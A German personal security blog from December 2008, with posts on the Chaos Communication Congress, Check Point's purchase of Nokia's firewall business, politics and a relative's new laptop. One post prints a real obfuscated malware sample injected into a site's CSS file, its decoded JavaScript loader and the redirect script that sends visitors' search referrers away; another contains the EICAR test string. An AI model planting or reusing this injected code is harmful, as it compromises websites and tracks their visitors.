27. Dezember 2008
So, ich bin angekommen. Wie geplant, erfreulicherweise kein Stau. Aber eben auch nicht rechtzeitig zu Fefes Vortrag. Naja egal, Fefe wird die FEM-Leute schon treten, bis die Videos da sind.
Meine DECT-Nummer vom letzten Jahr war leider schon vergeben, jetzt habe ich eine ähnliche neue: 2267.
Falls ich nicht gerade in einem spannenden Vortrag bin (da mache ich das Telefon höflicherweise aus) bin ich darüber erreichbar. Es sei denn, ich bin gerade nicht im BCC. So ab 50 m vor dem BCC bucht sich mein Telefon leider aus. Mein Hotel ist 500 m weit weg 🙂
Mein erster Eindruck: Irgendwie ist wenig los. Ok, das übliche Gedränge auf den Gängen aber der Catering-Bereich erscheint aufgeräumter als sonst und sogar im Hackcenter hätte ich leicht noch einen Platz kriegen können. Internet funktioniert, Telefon auch, mal sehen, was wird.
Nachtrag:
Ach ja, Ralf und Vido, die von mir noch ein Bier bzw. eine Bionade ausgegeben bekommen, dürfen die Nummer natürlich auch gerne nutzen. Ihr solltet lediglich noch eure E-Mail Adresse wissen mit der ihr den Kommentar abgegeben habt, damit nicht jeder Leser hier auf dem Congress ein Freibier will 🙂
Nachtrag 2:
Der erste Eindruck hat getäuscht. Inzwischen wird es richtig voll. Glücklich, wer Strom und Ethernet hat. Wie ich 😉
26. Dezember 2008
Meine fertige Agenda ab morgen:
27.12.2008
Ich schätze, die 14:00 Uhr Vorträge lasse ich aus, dann kann ich vormittags gemütlich aus München anreisen. Dan Kaminsky halte ich für etwas überschätzt, insbesondere ist mir in seinen Vorträgen zu viel Show und zuwenig greifbare Informationen. Da kann man auch die Präsentation lesen und muss sowieso alles nacharbeiten. Ansonsten ist der erste Tag für mich nicht so spannend. Das sind kaum Themen, mit denen ich mich tatsächlich beschäftige.
28.12.2008
Ich verspreche mir hier besonders viel von Attacking Rich Internet Applications, da Webserver heute das Haupteinfallstor in Unternehmen sind, außerdem von Short Attention Span Security und Tricks: makes you smile. Die Italiener waren letzte Jahr schon cool. Da sind bestimmt ein paar Anregungen für Pentests oder Sicherheitsanalysen dabei. Außerdem möchte ich die TCP Denial of Service Vulnerabilites ansehen. Da weiß ich einiges und Fabian hat letztes Jahr ja schon den Vortrag über Port Bunny gehalten, der kennt sich mit TCP sehr gut aus.
29.12.2008
Sehr interessant wird sicher der Flash-Vortrag von fukami und vermutlich auch der IOS-Vortrag von FX. Mich persönlich interessieren auch die Vorträge zu Honeypots (Squeezing Attack Traces) und zu den chinesischen Hackern (We got owned …).
30.12.2008
Mal sehen, der vierte Tag sieht noch nicht so spannend aus aber da fehlen zu einigen Vorträgen auch noch Details.
Also … man sieht sich. Und für ein Bier einfach durchklingeln, meine Nummer steht im Impressum.
24. Dezember 2008
Twister hat die diversen Lügen, Verdrehungen und Widersprüche des BKA-Chefs Ziercke und des Stasi 2.0 Ministers Schäuble bei Telepolis sehr schön zusammengestellt:
BKA, BDK, Lügen und Onlinedurchsuchungen
Man fragt sich ja, haben die gar kein Schamgefühl mehr oder sind das alles verkappte Nazis, die die Geschichte zurückdrehen wollen? Und was sagt unsere Hosenanzug tragende Sprechblasenautomatin dazu? Genau … nichts.
23. Dezember 2008
Firewall-Appliances sind schon seit geraumer Zeit der Renner, niemand kauft mehr eine Firewall-Software die dann auf einem Standardbetriebssystem installiert wird. Gehärtete Betriebssystemvarianten (meist Linux) sind ok, aber dann möchte man auch nicht viel mit der Konfiguration und dem Update des Betriebssystems zu tun haben. Check Point dagegen sah sich lange Zeit als reiner Software-Hersteller und hat das Appliance-Geschäft Partnern überlassen. Beispielsweise gab es Check Point auf IBM, auf Dell-Hardware, kurzzeitig sogar auf Pyramid Appliances …
Inzwischen hat Check Point eingesehen, dass es ohne eigene Hardware nicht geht. Als ersten Schritt hat Check Point die ehemalige Ericcsson-Tochter Sofaware gekauft und daraus die Edge-Appliances geformt. Danach hat Check Point zuerst mit der UTM-1 und später mit der Power-1 eigene Hardware an den Start gebracht. SecurePlatform, das Linux-basierte gehärtete eigene Betriebssystem gibt es ja schon seit geraumer Zeit als „Software-Appliance“.
Gleichzeitig hat Check Point mit der eigenen Hardware jedoch den Appliance-Partnern das Leben schwer gemacht. Ich kenne mehrere Unternehmen, denen die Kosten für Nokia einfach zu hoch wurden und die statt dessen auf Standard-Server mit SecurePlatform wechselten oder gleich zu einer UTM-1, die mit einem (für Check Point) günstigen Bundle-Preis aus Hardware und Software kommt. Der ehemals eigenständige Geschäftsbereich Nokia Internet Communications ist schon vor Jahren dem Bereich Nokia Networks zugeschlagen worden, eine große Zahl der damaligen Nokia-Mitarbeiter hat das Unternehmen inzwischen verlassen.
Konsequenterweise hat Nokia diesen Geschäftszweig jetzt an Check Point verkauft. Ich bin mir sicher, Nokia ist froh diesen Bereich los zu sein, die Gewinne dürften in den letzten Jahren deutlich eingebrochen sein. Allerdings ist mir nicht 100% klar, warum sich Check Point dieses Geschäft ans Bein bindet. Ok, es gibt eine breite Basis installierter Check Point Lizenzen auf Nokia, die Check Point nicht verlieren will. Allerdings wäre es sicher auch denkbar gewesen, diese Kunden auf die Power-1 Appliance zu hieven.
Statt dessen hat Check Point jetzt drei verschiedene Appliance-Typen am Hals:
- Sofaware Edge, die mit einer Firmware ausgestattet sind, die nichts mit der normalen FireWall-1 Software zu tun hat. Insbesondere läuft auf der Edge nicht das gewohnte FireWall-1 Kernel-Modul, das den Firewall-Bytecode in einer VM interpretiert.
- Check Point UTM-1/Power-1 mit SecurePlatform, Linux-basierte Appliances die Check Point aktuell von einem 2.4.22 auf einen aktuellen 2.6.x Kernel umstellt, weil es inzwischen wohl mehr und mehr Probleme mit Treibern für aktuelle Hardware gibt.
- Check Point Nokia, mit dem ursprünglich FreeBSD-basierten IPSO, das sich grundsätzlich anders als Linux verhält, mit eigner Weboberfläche (Voyager) und eigener zentraler Verwaltungssoftware (HorizonManager).
Ich bin gespannt, wie Check Point das zusammenführen will.
Eine Abkehr von SecurePlatform dürfte nicht möglich sein. Ansonsten wird Check Point nur noch Appliances anbieten können, da für IPSO keine Treiber für allgemeine Server Hardware vorhanden ist. Andererseits enthält IPSO einen eigenen Routing-Dämon, SecurePlatform könnte in Zukunft auf den Gate-Dämon verzichten.
Meine persönliche Meinung ist, dass Check Point das Nokia-Geschäft für nen Apple und ’n Ei günstig in der Rezession erworben hat um Zugriff auf die Kundendatenbank von Nokia zu erhalten. Die Kunden werden mittelfristig von der Nokia Hardware mit IPSO auf die Check Point Appliances mit SecurePlatform umgestellt und IPSO wird sterben. Und da Check Point jetzt die Kontrolle über die Nokia Appliance-Entwicklung hat, kann diese Migration ganz nach den Vorstellungen Check Points gesteuert werden.
Nachtrag:
Aber schön, wie in der Pressemitteilung nochmal die alten Slogans ausgegraben werden, beispielsweise „best-of-breed solution“ oder „First Call – Final Resolution“. Nur der Slogan „The Power of Two“ fehlt … aber der ist ja nun auch nicht mehr aktuell.
(via The Register)
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
Kleiner Test: einfach mal den Eicar-String in den RSS-Feed kopieren. Falls ein Virenscanner anschlägt würde ich mich über Rückmeldung freuen. Eigentlich sollte darauf kein einziger Scanner reagieren. Aber man weiß ja nie …
Sehr spannend: Avast schlägt prompt Alarm, wenn man sich meinen letzten Beitrag (den mit dem Javascript-Schadcode) im Feed ankuckt:
Die Malware-Erkennung ist im übrigen korrekt, das ist das Javascript-Programm, das ich im letzten Beitrag beschrieben habe. Dumm nur, dass ich das Programm lediglich im Text stehen habe, nicht in <script>-Tags. Es sollte daher auch nicht ausgeführt werden. Das Problem für einen Virenscanner ist allerdings, dass diese Unescape-Sequenz nicht nur in HTML-Dateien sondern in CSS-Files versteckt wird. Im Gegensatz dazu ist die Bytefolge sehr charakteristisch.
Ich denke daher, Avast hat lediglich ein Patternmatching auf die Unescape-Sequenz implementiert und schlägt daher immer Alarm wenn diese Folge auftaucht, egal ob ausführbares Skript oder nicht. Mein Antivir schlägt beim Zugriff auf infizierte Webseiten auch Alarm, nicht jedoch beim RSS-Feed.
(Danke Nikola, für die Zusendung des Screenshots)
22. Dezember 2008
Zur Zeit scheint es sich wieder zu häufen, dass Webseiten kompromittiert werden. Zumindest ist das mein persönlicher Eindruck wenn man so durch das Internet surft. Im Gegensatz zu früher findet man jedoch kaum noch Defacements, statt dessen werden CSS-Dateien möglichst unauffällig infiziert:
/* a0b4df006e02184c60dbf503e71c87ad */
body { margin-top: expression(
eval(unescape('
%69%66%20%28%21%64%6F%63%75%6D%65%6E%74%2E%67%65%74
%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%4A%53%53%53
%27%29%29%7B%20%4A%53%53%31%20%3D%20%35%39%3B%20%4A
%53%53%32%20%3D%20%35%38%35%32%36%31%3B%20%4A%53%53
%33%20%3D%20%27%2F%6C%69%76%69%6E%67%2D%70%6C%61%6E
%65%74%2F%34%69%6D%61%67%65%73%2F%74%65%6D%70%6C%61
%74%65%73%2F%69%6E%65%67%69%62%65%2F%64%75%6D%6D%79
%2E%68%74%6D%27%3B%20%76%61%72%20%6A%73%20%3D%20%64
%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65
%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%20%6A
%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%73
%72%63%27%2C%20%27%2F%6C%69%76%69%6E%67%2D%70%6C%61
%6E%65%74%2F%34%69%6D%61%67%65%73%2F%74%65%6D%70%6C
%61%74%65%73%2F%69%6E%65%67%69%62%65%2F%63%68%65%63
%6B%2E%6A%73%27%29%3B%20%6A%73%2E%73%65%74%41%74%74
%72%69%62%75%74%65%28%27%69%64%27%2C%20%27%4A%53%53
%53%27%29%3B%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74
%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65
%28%27%68%65%61%64%27%29%2E%69%74%65%6D%28%30%29%2E
%61%70%70%65%6E%64%43%68%69%6C%64%28%6A%73%29%20%7D
%3B%20
'))) }
/* a995d2cc661fa72452472e9554b5520c */
Wenn man den Hex-Code mittels Unescape dekodiert, findet man folgenden Javascript:
if (!document.getElementById('JSSS')){ JSS1 = 59; JSS2 = 585261; JSS3 = '/living-planet/4images/templates/inegibe/dummy.htm'; var js = document.createElement('script'); js.setAttribute('src', '/living-planet/4images/templates/inegibe/check.js'); js.setAttribute('id', 'JSSS'); document.getElementsByTagName('head').item(0).appendChild(js) };
Und in der Datei check.js dann die eigentliche Schadfunktion:
if ( (Math.random()*60 < JSS1) && document.referrer.match(/^http:\/\/([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport| mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24)\./) && document.referrer.match(/[?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string| search_word|buscar|text|words|su|qt|rdata)\=/) && !document.referrer.match(/[?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string| search_word|buscar|text|words|su|qt|rdata)\=[^&]+(%3A|%22)/) ){ location.href=JSS3+'?r='+encodeURIComponent(document.referrer)+'&s='+JSS2; };
Das Javascript-Segment prüft also meinen Referer und schickt den durch die Gegend. Für mich sieht das wie klassisches aber unauffälliges Ausspionieren aus. Sehr unfreundlich. Vielleicht sollte man den Betreiber des Servers www.sixstorms.de (Vorsicht beim Klicken!) warnen. Ich finde nur gerade keine Mailadresse. Eigentlich aber auch egal. Wer Firefox und Noscript verwendet ist vor dem Angriff geschützt, der Rest sind dann vermutlich Kollateralschäden.
21. Dezember 2008
Die setzen schon auf neueste Technologie da, bei der Post:
Schön, dass Mozilla die Version 2.x bereits abgekündigt und den letzten Patch veröffentlicht hat. Schnarchnasen bei der Schneckenpost. Alle.
19. Dezember 2008
Meine Mutter hat einen neuen Computer. Von einem großen Anbieter, der hauptsächlich direkt über seine Webseite verkauft. Bereits die Bestellung war ein Drama, da in den Nachrichten bekanntlich regelmäßig Horrormeldungen über Betrug im Internet verbreitet werden. Die Eingabe von Kreditkartendaten war für meine Mutter deshalb bereits eine große Überwindung. Nun ja, der Computer ist gestern angekommen.
Mein Telefon klingelt.
Ich: „Hallo?“
Sie: „Der Computer ist da, kannst du mal vorbeikommen?“
Ich: „Hast ihn schon ausgepackt?“
Sie: „Nein, das traue ich mich nicht. Kannst du nicht nachher herkommen und schauen, dass alles da ist?“
Ich seufze, vorsichtshalber unhörbar.
Ich: „Ja, aber erst nach sechs Uhr.“
Gesagt getan, pünktlich kurz nach sechs schlage ich bei meinen Eltern auf. Mein Vater hat den Computer inzwischen doch ausgepackt, ein Laptop mit schwarzer Hochglanzoberfläche. Meine Mutter rubbelt mit einem Tuch bereits die ersten Fingertapper weg.
Ich: „Gib mal her.“
Sie: „Moment, ich muss erst die Abdrücke wegmachen.“
Nach etwas hin und her bekomme ich den Computer, Windows XP, immerhin schon mit SP3 aber viele Updates fehlen trotzdem. Etwa 250 MB Updates später bekommt sie den Rechner zurück. Ich habe ihr einen Account, vorsichtshalber ohne Passwort angelegt. Man muss nur auf das Icon klicken. Danach wieder ausgeschaltet, sie soll ja mal alles eine machen.
Ich: „So, jetzt kannst du ihn mal testen.“
Sie hält das Gerät … nuja … nicht ganz richtig rum. Der Hersteller hat sein Firmenlogo so angebracht, dass es richtig steht wenn das Display ausgeklappt ist. Dafür muss es aber auf dem Kopf stehen zum Öffnen.
Sie: „Wo geht der denn auf?“
Ich: „andersrum.“
Sie schaut das Gerät von unten an, findet aber dann doch schnell raus, wie man das Display aufklappt und nach etwas drehen und suchen auch den Einschaltknopf direkt unterhalb des Displays.
Ich: „Dann mach mal …“
Sie: freudig „Der ist ja richtig schnell“
Ich: „Starte mal ein Programm.“
Sie: klickt auf Start „Wo ist denn da Programme?“ enttäuscht „Das sieht ja alles ganz anders aus.“
Ich vergaß … rechter Mausklick auf die Taskleiste, umstellen auf klassisches Startmenü, jetzt sieht das auch aus wie gewohnt.
Ich: „Probier’s nochmal.“
Sie: freudig „Ja, so kenn ich das“
Sie startet Word. Jetzt muss man wissen, dass sie bisher Word 2000 hatte und auf dem neuen Rechner eine Lizenz für Office 2007 Home dabei ist. Das sieht … nunja … etwas anders aus.
Sie: enttäuscht „Wie sieht das denn aus? Das ist ja alles ganz anders. Da muss ich mich ja ganz neu einarbeiten!“
Bevor ich was sagen kann hat sie Word schon wieder geschlossen.
Sie: „Dann spiele ich halt erstmal was.“ und startet Solitär.
In der Standardeinstellung deckt Solitär aber immer drei Karten auf einmal auf. Was man jedoch leicht umstellen könne …
Sie: wieder enttäuscht „Das sieht ja auch ganz anders aus. Das ist aber doof!“
Ich würde ihr das ja umstellen aber soweit komme ich gar nicht mehr. Bevor ich noch etwas sagen kann fährt sie den Computer runter.
Sie: „Das ist mir jetzt zu viel Arbeit. Das schaue ich mir nach Weihnachten nochmal an.“
Und jetzt atme ich erleichtert auf. Weihnachten ist mein Bruder auch mal wieder im Lande, dann darf er ihr gerne alles erklären. Den alten Rechner hat ja auch er für sie eingerichtet. Sie rubbelt mit dem Tuch die letzten Fingertapper weg und packt den Computer wieder ein.
Sie: „Ach ja, für den neuen Computer brauche ich auch noch eine neue E-Mail Adresse.“
Gerne. Das darf ihr auch mein Bruder einrichten. 🙂
17. Dezember 2008
Heute ist wieder ein schönes Beispiel, warum der Staat inzwischen die größte Gefahr für den Bürger ist:
Dafür genügen inzwischen zwei Heise-Links.
